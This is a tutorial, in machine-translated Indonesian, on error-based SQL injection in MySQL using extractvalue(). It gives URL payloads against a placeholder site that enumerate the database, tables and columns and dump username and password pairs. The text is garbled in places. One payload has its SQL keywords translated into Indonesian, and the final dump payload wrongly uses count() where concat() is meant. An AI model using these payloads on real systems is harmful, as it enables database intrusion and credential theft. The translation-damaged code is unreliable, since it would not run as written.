Error Based Injection menggunakan Extractvalue
Setelah membahas Basic Injections, sekarang kita bisa pindah ke injeksi XPATH terus terang ini favorit saya. 
Sekarang kita bisa melanjutkan diskusi setelah injeksi berdasarkan Batas Dasar dan Melewati Batas Bypass datang XPATH. 

Hal-hal yang perlu diingat jika Anda mendarat di halaman ini untuk mencari injeksi khusus XPATH, maka biarkan saya memberi tahu Anda tempat yang salah. 

Di sini kita tidak benar-benar menyuntikkan ke XPATH, kita hanya menggunakan salah satu fungsi XPATH yang Extractvalue () untuk menghasilkan kesalahan dan mendapatkan output.
The & qout; ExtractValue& qout; fungsi di MySQL menjalankan query XPath terhadap string yang mewakili data XML. Fungsi mengambil input dalam bentuk berikut:
ExtractValue ('xmldatahere', 'xpathqueryhere')
Jika permintaan XPath secara sintaks salah, kita disajikan dengan pesan
kesalahan: kesalahan sintaks XPATH: 'xpathqueryhere'

Beberapa n00bz seperti saya mungkin berpikir, mengapa kita sebenarnya membutuhkan yang ini? karena kami sudah memiliki suntikan berbasis Union !!
Hah!!! Ya benar ... tetapi beberapa kali, queri dan perilaku aplikasi web yang berbeda membuat sulit untuk menyuntikkan beberapa suntikan dan aplikasi web mungkin hanya memeriksa validitas masukan dan tidak menampilkan output apa pun dari database.

 Jadi sesuai kondisi kita mungkin harus menggunakan Injeksi yang berbeda untuk masuk ke database.
ohhh ... jadi dalam kondisi apa saya harus menggunakan suntikan ini?
Sesuai pengalaman saya sebagian besar
kali kondisi di mana kita mulai menyuntikkan dengan satu qoute, kutipan ganda, dll, kita mendapatkan kesalahan, baik dan bagus. Kami sekarang mengomentari pertanyaan dan mulai mencari jumlah kolom. huh kami mendapat kolom juga menggunakan pesanan oleh.
Mari kita asumsikan ada 5 kolom.
Sekarang ketika kita menyuntikkan injeksi Union Based, apa F .. ?? kita tidak bisa melihat output apa pun di sana. Sebelumnya ketika kita digunakan untuk menyuntikkan kita mendapat output yang memberitahu kita kolom rentan untuk disuntikkan. Jadi ini adalah kondisi ketika Anda dapat bergantung pada injeksi XPATH.

oke mari kita Mulai dari kondisi yang sama kita bahas di atas.5 kolom yang ditemukan mencoba Injeksi berikut tetapi tidak ada output.

www.vuln-web.com/index.php?view=-35 "order by 1,2,3,4,5--


Seperti yang Anda bisa lihat kutipan ganda di sana .. itu berarti kali ini kita menyuntikkan ke dalam jenis string query di mana permintaan seperti.
Kueri :
pilih jalur dari halaman di mana view = "<our_input_here>" limit 1,1;


Jadi mari kita lanjutkan injeksi kami menggunakan injeksi XPATH.

www.vuln-web.com/index.php?view=-35 "and extractvalue (0x0a, concat (0x0a, ( QUERY KITA DI SINI ))) -


Mendapatkan Basis Data Saat Ini:

www.vuln-web.com/index.php?view=-35 "and extractvalue (0x0a, concat (0x0a, (select database ()))) -
Output: kesalahan sintaks XPATH: 'database_name_here'

saat kami mendapatkan Database, mari kita lanjutkan: D
Mendapatkan tabel dalam Database saat ini:

www.vuln-web.com/index.php?view=-35 "dan extractvalue (0x0a, concat (0x0a, (pilih table_name dari information_schema.tables di mana table_schema = database () limit 0,1))) -
Output: Kesalahan sintaks XPATH: 'table_name_here'

seperti yang Anda lihat saya menggunakan batas karena kami tidak dapat mengekstrak data panjang yang membatasi hingga 32 karakter. 
Jadi saya lebih suka: P untuk pergi satu demi satu meningkatkan baris untuk mendapatkan output. nah jika Anda ingin membuang database, pergi untuk alat apa pun atau proxy manual, buat skrip Anda sendiri untuk mendapatkan data yang dibuang untuk Anda yang saya lebih suka menjadi opsi terbaik.
Jadi Sekarang mari kita asumsikan kita mendapat tabel berikut menggunakan Query di atas:
Posts
Assets
Banner
Links
Users
Mari kita lanjutkan dan mencoba mendapatkan kolom:

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)))--
Output: kesalahan sintaks XPATH: 'column_name_here'

Biarkan Kami mengatakan kami mendapat 3 Kolom:
id
username
password
Mari kita buang data dari mereka, tetapi sebelum itu mari hitung jumlah Kolom.
Menghitung jumlah kolom:

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select count(username) from users)))--
Output: kesalahan sintaks XPATH: 'count_will_come_here'

Anda dapat menggunakan trik yang sama untuk menghitung tabel atau kolom juga. Jadi sekarang mari kita lanjutkan membuang data

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select count(username,0x3a,password) from users limit 0,1)))--
Output : XPATH syntax error: 'Output_here'


Jika Anda memiliki masalah memahami Batas atau hal lain ... saya sarankan untuk membaca dasar-dasar lagi.
Karena apa pun yang saya gunakan baru saya jelaskan, apa yang saya jelaskan adalah dasar-dasar yang sudah saya bahas sebelumnya.